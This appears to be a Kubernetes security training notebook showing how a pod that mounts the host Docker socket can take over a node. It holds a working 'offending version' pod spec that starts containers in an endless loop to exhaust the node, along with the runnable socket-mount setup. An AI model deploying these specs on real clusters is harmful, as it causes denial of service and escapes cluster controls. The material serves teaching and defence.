**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Cloudbomb


## Purpose

It is shown, how dangerous it is 

* to start an image from an untrusted source
* with __root privileges__
* and __access to the host file system__

This examples destroys the cluster step by step. 

It is a dangerous example, turned _s l o w_ for didactic purposes.

It can even be made more disruptive easily.

Don't put images like this into public registries.


#### Create an empty directory and change into

In [1]:
mkdir -p cloudbomb
cd cloudbomb

In [2]:
pwd

/minikube-host/notebooks/training-kubernetes-security/cloudbomb


#### Get Docker

See the latest statically linked versions here
https://download.docker.com/linux/static/stable/x86_64/

In [3]:
curl https://download.docker.com/linux/static/stable/x86_64/docker-19.03.8.tgz -o docker.tgz

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 60.7M  100 60.7M    0     0  11.1M      0  0:00:05  0:00:05 --:--:-- 11.7M


In [4]:
tar tzf docker.tgz

docker/
docker/containerd
docker/docker
docker/ctr
docker/dockerd
docker/runc
docker/docker-proxy
docker/docker-init
docker/containerd-shim


In [5]:
pwd

/minikube-host/notebooks/training-kubernetes-security/cloudbomb


In [6]:
tar xzf docker.tgz

### Create the Dockerfile

and build the image **inside minikube**

In [7]:
cat > Dockerfile <<EOF
FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]
EOF
cat Dockerfile

FROM alpine

COPY docker/docker /usr/bin

CMD ["docker", "ps"]


In [8]:
docker images

REPOSITORY                                TAG       IMAGE ID       CREATED        SIZE
nginx                                     latest    ea335eea17ab   13 days ago    141MB
nginxinc/nginx-unprivileged               latest    197ced34802c   2 weeks ago    141MB
k8s.gcr.io/kube-apiserver                 v1.22.2   e64579b7d886   2 months ago   128MB
k8s.gcr.io/kube-controller-manager        v1.22.2   5425bcbd23c5   2 months ago   122MB
k8s.gcr.io/kube-scheduler                 v1.22.2   b51ddc1014b0   2 months ago   52.7MB
k8s.gcr.io/kube-proxy                     v1.22.2   873127efbc8a   2 months ago   104MB
kubernetesui/dashboard                    v2.3.1    e1482a24335a   5 months ago   220MB
k8s.gcr.io/etcd                           3.5.0-0   004811815584   5 months ago   295MB
kubernetesui/metrics-scraper              v1.0.7    7801cfc6d5c0   5 months ago   34.4MB
k8s.gcr.io/coredns/coredns                v1.8.4    8d147537fb7d   6 months ago   47.6MB
gcr.io/k8s-minikube/storage-pr

In [9]:
docker build . -t cloudbomb

Sending build context to Docker daemon  274.7MB
Step 1/3 : FROM alpine
latest: Pulling from library/alpine

Digest: sha256:21a3deaa0d32a8057914f36584b5288d2e5ecc984380bc0118285c70fa8c9300
Status: Downloaded newer image for alpine:latest
 ---> c059bfaa849c
Step 2/3 : COPY docker/docker /usr/bin
 ---> e8c9bc123150
Step 3/3 : CMD ["docker", "ps"]
 ---> Running in b90c51f3c1bc
Removing intermediate container b90c51f3c1bc
 ---> 0fa6bb93d0d3
Successfully built 0fa6bb93d0d3
Successfully tagged cloudbomb:latest


#### Check the images

`grep -E ... ` is only for colouring 

In [10]:
docker images | grep --color=always -E '$|cloudbomb.*$' 

REPOSITORY                                TAG       IMAGE ID       CREATED         SIZE
cloudbomb                                 latest    0fa6bb93d0d3   2 minutes ago   71.4MB
alpine                                    latest    c059bfaa849c   5 days ago      5.59MB
nginx                                     latest    ea335eea17ab   13 days ago     141MB
nginxinc/nginx-unprivileged               latest    197ced34802c   2 weeks ago     141MB
k8s.gcr.io/kube-apiserver                 v1.22.2   e64579b7d886   2 months ago    128MB
k8s.gcr.io/kube-controller-manager        v1.22.2   5425bcbd23c5   2 months ago    122MB
k8s.gcr.io/kube-scheduler                 v1.22.2   b51ddc1014b0   2 months ago    52.7MB
k8s.gcr.io/kube-proxy                     v1.22.2   873127efbc8a   2 months ago    104MB
kubernetesui/dashboard                    v2.3.1    e1482a24335a   5 months ago    220MB
k8s.gcr.io/etcd                           3.5.0-0   004811815584   5 months ago    295MB
kubernetesui/metric

## Create the Cloudbomb Pod

* it is mounting the Docker socket `/var/run/docker.sock` into the container, we have `hostPath` rights
* the `docker` process is running as `root`
* **Gotcha**

# Offending version, don't use

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker run -d --name BOOM_\$(cat /dev/urandom | \
             tr -cd 'a-f0-9' | \
             head -c 6) nginx ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
```

# Soft version

In [23]:
kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cloudbomb 
spec:
  containers:
  - image: cloudbomb
    imagePullPolicy: IfNotPresent
    command:
      - /bin/sh
      - "-c" 
      - "while true; \
           do \   
             docker ps ; \
             sleep 10 ; \
           done"
    name: cloudbomb
    volumeMounts:
    - mountPath: /var/run/docker.sock
      name: docker-socket
  volumes:
  - name: docker-socket
    hostPath:
      path: /var/run/docker.sock
      type: Socket
EOF

pod/cloudbomb created


In [12]:
kubectl get pods

NAME                            READY   STATUS    RESTARTS   AGE
cloudbomb                       1/1     Running   0          4s
nginx-strict-5cdc48cf55-5gzxm   1/1     Running   0          54m
nginx-strict-5cdc48cf55-lxc8w   1/1     Running   0          54m
nginx-strict-5cdc48cf55-wwqhs   1/1     Running   0          54m


In [14]:
kubectl wait --for=condition=ready --timeout=10s pod/cloudbomb

pod/cloudbomb condition met


In [15]:
kubectl get pods

NAME                            READY   STATUS    RESTARTS   AGE
cloudbomb                       1/1     Running   0          6s
nginx-strict-5cdc48cf55-f5r5l   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-v72v5   1/1     Running   0          3h45m
nginx-strict-5cdc48cf55-xkh98   1/1     Running   0          3h45m


In [19]:
kubectl logs cloudbomb

CONTAINER ID        IMAGE                         COMMAND                  CREATED                  STATUS                  PORTS               NAMES
9262dd397bc2        0fa6bb93d0d3                  "/bin/sh -c 'while t…"   Less than a second ago   Up Less than a second                       k8s_cloudbomb_cloudbomb_default_91a424dd-9a79-47dc-a939-f0d80b6e23ac_0
287b97245b66        k8s.gcr.io/pause:3.5          "/pause"                 Less than a second ago   Up Less than a second                       k8s_POD_cloudbomb_default_91a424dd-9a79-47dc-a939-f0d80b6e23ac_0
30e8fbea03ed        nginxinc/nginx-unprivileged   "/docker-entrypoint.…"   54 minutes ago           Up 54 minutes                               k8s_nginx_nginx-strict-5cdc48cf55-lxc8w_default_a770a53d-4f08-4e4d-9ab8-9f90b21efe06_0
e8f2365a91c4        nginxinc/nginx-unprivileged   "/docker-entrypoint.…"   54 minutes ago           Up 54 minutes                               k8s_nginx_nginx-strict-5cdc48cf55-5gzxm_default_58a

# Docker is 💩, let us use `cri-o`

Doesn' solve the principle problem

## Docker vs Kubernetes

The docker command bypasses Kubernetes. It is *not* visible to the `kubelet` and the `api-server`

It will kill the node _s l o w l y_

In [ ]:
docker ps | grep -E '$|.*BOOM.*$'

## Kube-Scan

Examine the pod with [Octarine Kube-Scan](https://github.com/octarinesec/kube-scan)

Open a separate terminal window and run `minikube tunnel` in this terminal

In [16]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml

namespace/kube-scan created
configmap/kube-scan created
serviceaccount/kube-scan created
clusterrole.rbac.authorization.k8s.io/kube-scan created
clusterrolebinding.rbac.authorization.k8s.io/kube-scan created
deployment.apps/kube-scan created
service/kube-scan-ui created


In [18]:
kubectl wait -n kube-scan --for=condition=available deployment/kube-scan

error: timed out waiting for the condition on deployments/kube-scan


: 1

In [14]:
kubectl apply -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

namespace/kube-scan unchanged
configmap/kube-scan unchanged
serviceaccount/kube-scan unchanged
clusterrole.rbac.authorization.k8s.io/kube-scan configured
clusterrolebinding.rbac.authorization.k8s.io/kube-scan configured
deployment.apps/kube-scan unchanged
service/kube-scan-ui configured


In [16]:
echo http://$(kubectl -n kube-scan get service kube-scan-ui -o jsonpath={..ip})

http://10.96.201.143


# Risk Score

Current 5, should be 8-9 

I own the node, no network access

# Cleanup

In [20]:
kubectl delete pod cloudbomb

pod "cloudbomb" deleted


In [21]:
kubectl delete -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan.yaml -f https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml

namespace "kube-scan" deleted
configmap "kube-scan" deleted
serviceaccount "kube-scan" deleted
clusterrole.rbac.authorization.k8s.io "kube-scan" deleted
clusterrolebinding.rbac.authorization.k8s.io "kube-scan" deleted
deployment.apps "kube-scan" deleted
service "kube-scan-ui" deleted
namespace "kube-scan" deleted
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": configmaps "kube-scan" not found
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": serviceaccounts "kube-scan" not found
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": deployments.apps "kube-scan" not found
Error from server (NotFound): error when deleting "https://raw.githubusercontent.com/octarinesec/kube-scan/master/kube-scan-lb.yaml": services "kube-scan-ui" not found
[unab

: 1

# Pedestrians approach

In [25]:
kubectl get pods cloudbomb -o yaml | grep hostPath

  - hostPath:
